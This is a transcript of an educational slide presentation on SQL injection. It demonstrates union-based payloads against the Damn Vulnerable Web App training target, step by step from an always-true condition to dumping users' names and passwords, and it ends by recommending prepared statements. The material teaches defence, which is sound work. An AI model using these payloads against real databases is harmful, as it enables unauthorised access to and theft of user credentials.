SQL Injection By Wenonah Abadilla. Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements.

Slides:



Advertisements
Similar presentations
© 2008 Security-Assessment.com 1 Time Based SQL Injection Presented by Muhaimin Dzulfakar.
Advertisements

Database Management Using Microsoft Access Xinhua Chen, Ph.D. Chinese Association of Professionals in Science and Technology March 23, 2003.
WebGoat & WebScarab “What is computer security for $1000 Alex?”
Nic Shulver, Introduction to SQL Topics covered Structured Query Language What can it do? Advantages of SQL Why bother with SQL?
NAVY Research Group Department of Computer Science Faculty of Electrical Engineering and Computer Science VŠB-TUO 17. listopadu Ostrava-Poruba.
Creating WordPress Websites. Creating a site on your computer Local server Local WordPress installation Setting Up Dreamweaver.
07 December 2009Slide 1 of 1207 December 2009Slide 1 of 12 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
07 December 2009Slide 1 of 9 SQL Injection Primer By Nicole Gray, Cliff McCullough, Joe Hernandez.
Sara SartoliAkbar Siami Namin NSF-SFS workshop July 14-18, 2014.
CSC 2720 Building Web Applications Database and SQL.
Chapter 7 Managing Data Sources. ASP.NET 2.0, Third Edition2.
SJSU CS157B Dr. Lee1  2004 Jenny Mitchell Two Useful Tools You Can’t Live Without by Jenny Mitchell SJSU CS157B Section PHP and MySQL.
CSCI 6962: Server-side Design and Programming
SQL Power Injector Avadanei AlinBalan Robert. What is SQL Power Injector ?  A graphical application created in C#.Net 1.1 that helps the penetration.
CSCI 6962: Server-side Design and Programming JDBC Database Programming.
Lecture 14 – Web Security SFDV3011 – Advanced Web Development 1.
Copyright © 2003 Pearson Education, Inc. Slide 8-1 The Web Wizard’s Guide to PHP by David Lash.
Lecture slides prepared for “Computer Security: Principles and Practice”, 3/e, by William Stallings and Lawrie Brown, Chapter 5 “Database and Cloud Security”.
Web Server Administration Chapter 7 Installing and Testing a Programming Environment.
Attacking Applications: SQL Injection & Buffer Overflows.
Class 1Intro to Databases Goals of this class Understand the architecture behind web database applications Gain a basic understanding of what relational.
15/10/20151 PHP & MySQL 'Slide materials are based on W3Schools PHP tutorial, 'PHP website 'MySQL website.
PHP MySQL Introduction. MySQL is the most popular open-source database system. What is MySQL? MySQL is a database. The data in MySQL is stored in database.
MySQL Databases & PHP Integration Using PHP to write data to, and retrieve data from, a MySQL database.
CSC 2720 Building Web Applications Database and SQL.
NMED 3850 A Advanced Online Design January 12, 2010 V. Mahadevan.
SYST Web Technologies SYST Web Technologies Databases & MySQL.
CANDID : Preventing SQL Injection Attacks Using Dynamic Candidate Evaluations V. N. Venkatakrishnan Assistant Professor, Computer Science University of.
Database control Introduction. The Database control is a tool that used by the database administrator to control the database. To enter to Database control.
Intro to DatabasesClass 4 SQL REVIEW To talk to the database, you have to use SQL SQL is used by many databases, not just MySQL. SQL stands for Structured.
Security Attacks CS 795. Buffer Overflow Problem Buffer overflows can be triggered by inputs that are designed to execute code, or alter the way the program.
Open Source Server Side Scripting ECA 236 Open Source Server Side Scripting MySQL – Inserting Data.
Introduction to InfoSec – SQLI and jQuery (R9)
Web Server Administration Chapter 7 Installing and Testing a Programming Environment.
SQL – Injections Intro. Prajen Bhadel College of Information Technology & Engeneering Kathmandu tinkune Sixth semister.
Enterprise PHP – Reading Data from a DB Reading Data from a relational database in PHP Nic Shulver, FCES, Staffordshire University Using the SQLi interface.
Module Review Basic SQL commands: Create Database, Create Table, Insert and Select 2. Connect an SQL Database to PHP 3. Execute SQL Commands in.
NMD202 Web Scripting Week5. What we will cover today PHP & MySQL Displaying Dynamic Pages Exercises Modifying Data PHP Exercises Assignment 1.
WEB SECURITY WEEK 2 Computer Security Group University of Texas at Dallas.
DataBases and SQL INFSY 547 Spring Course Wrap Up April 12: Complete Work on Servlets Review of Team Projects Close of Portfolio Work April 19:
Web Security Lesson Summary ●Overview of Web and security vulnerabilities ●Cross Site Scripting ●Cross Site Request Forgery ●SQL Injection.
Class 1Intro to Databases Goals of this class Understand the architecture behind web database applications Gain a basic understanding of what relational.
JDBC CS 260 Database Systems. Overview  Introduction  JDBC driver types  Eclipse project setup  Programming with JDBC  Prepared statements  SQL.
CHAPTER 10 PHP MySQL Database
SQL Injection Anthony Brown March 4, 2008 IntroductionQuestionsBackgroundTechniquesPreventionDemoConclusions.
INFO 344 Web Tools And Development CK Wang University of Washington Spring 2014.
Distribution of Marks For Second Semester Internal Sessional Evaluation External Evaluation Assignment /Project QuizzesClass Attendance Mid-Term Test Total.
Databases Kevin Wright Ben Bruckner Group 40. Outline Background Vulnerabilities Log File Cleaning This Lab.
Example – SQL Injection MySQL & PHP code: // The next instruction prompts the user is to supply an ID $personID = getIDstringFromUser(); $sqlQuery = "SELECT.
Web Applications Attacks A: SQL Injection Stored Cross Site Scripting Prof. Reuven Aviv Department of Computer Science Tel Hai Academic College Topics.
ADVANCED SQL.  The SQL ORDER BY Keyword  The ORDER BY keyword is used to sort the result-set by one or more columns.  The ORDER BY keyword sorts the.
1 Section 1 - Introduction to SQL u SQL is an abbreviation for Structured Query Language. u It is generally pronounced “Sequel” u SQL is a unified language.
Hacker Games By Wenonah Abadilla. What is a Hacker Game? Learn and practice security concepts Fun-filled games.
1 c6212 Advanced Database and Client Server MS SQL Server 2000 Stored Procedures and Parameters What ? Why ? How ?
 MySQL is a database system used on the web  MySQL is a database system that runs on a server  MySQL is ideal for both small and large applications.
“Why is my blog selling boner pills?” An introduction to common web application attacks such as SQLi, XSS and command injection.
Cosc 5/4765 Database security. Database Databases have moved from internal use only to externally accessible. –Organizations store vast quantities of.
Web Systems & Technologies
SQL Injection By Wenonah Abadilla.
Database and Cloud Security
Database System Implementation CSE 507
Web Systems & Technologies
Introduction to Dynamic Web Programming
WEB APPLICATION TESTING
Theodore Lawson CSCE548 Student Presentation, Topic #2
SQL INJECTION ATTACKS.
ISC440: Web Programming 2 Server-side Scripting PHP 3
Lecture 2 - SQL Injection
MySQL Web Application Connecting to a MySQL database
Presentation transcript:

SQL Injection By Wenonah Abadilla

Topics What is SQL What is SQL Injection Damn Vulnerable Web App SQLI Demo Prepared Statements

What is SQL? Way you communicate with the database Structured Query Language Access and manipulate databases COSC 341 at IUP

What is SQL Injection? One of the most serious threats for Web Application Inject SQL commands into an SQL statement, via web page input. Alters an SQL statement and compromises the security of a web application Common with PHP and ASP applications due to the prevalence of older functional interfaces Occurs when Data enters a program from an untrusted source. The data used to dynamically construct a SQL query SQL Injection Harvesting SQL statements to render sensitive data

Types of SQLI Error Based Causes an error and gather information from the error Union Based Combine two or more SQL statements into one result Blind Asking a true or false question

Consequences of SQL Injection Confidentiality Authentication Authorization Integrity

Damn Vulnerable Web Site Demo PHP/MySQL web application Aid for security professionals Test skills and tools in a legal environment Help developers better understand the process of securing web applications

$getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘$id’”;

Basic Injection Webpage is supposed to print ID, First name, and Surname $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘1’”;

Always True Scenario Saying display all records that are false and all records that are true %’ – probably not equal to anything, and will be false ‘0’=‘0’ – Is equal to true, because 0 will always equal 0 $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or ‘0’=‘0’”;

Display Database Version Notice the last displayed line This is the version of the mysql database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, version() # “;

Display Database User Notice the last displayed line Name of the database user that executed the behind the scenes PHP code $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, user() # ;

Display Database Name Notice the last displayed line This is the name of the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, database() # ;

Display All Tables in the information_schema Displays all the tables in the information_schema database INFORMATION_SCHEMA is the informational database Stores information about all other databases that the MySQL server maintains $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables #” ;

Display All User Tables in the information_schema Quicker than looking through the previous output and manually looking for user table $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%’ or 0=0 union select null, table_name from information_schema.tables where table_name like ‘user%’ #” ; Displays all tables that start with the prefix “user” in the information_schema database

Display all Column fields in the User Table Displays all the columns in the users table Notice- user_id, first_name, last_name, user and password column $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #” ;

Display column Field Contents in the user table Successfully displayed all the necessary authentication information in the database $getid = “SELECT first_name, last_name FROM users WHERE user_id = ‘%' and 1=0 union select null,concat(first_name,0x0a,last_name,0x0a,user, 0x0a,password) from users #” ;

Prepared Statements and Bound Parameters The query and the data are sent to the SQL server separately Parameterized statements, Parameterized SQL Template for SQL Statements Values can be plugged into the query after the query is “prepared” and ready to be executed (?), Bound Parameters Placeholders where actual values are plugged in

Examples Java using JDBC Statements sets “?” to an actual value that is stored in the id variable PHP using PDO

Conclusion SQLI huge threat to web applications Use Prepared SQL Statements Download Damn Vulnerable Web App Questions?

Reference Page "Coding Dynamic SQL Statements." Oracle Docs. Oracle, n.d. Web. 18 Feb "(Damn Vulnerable Web App (DVWA): Lesson 6)." Computer Security Student. N.p., n.d. Web. 17 Feb "PHP Prepared Statements." W3schools. N.p., n.d. Web. 18 Feb "SQL Injection." OWASP. N.p., 14 Aug Web. 19 Feb "SQL Injection." W3school. N.p., n.d. Web. 15 Feb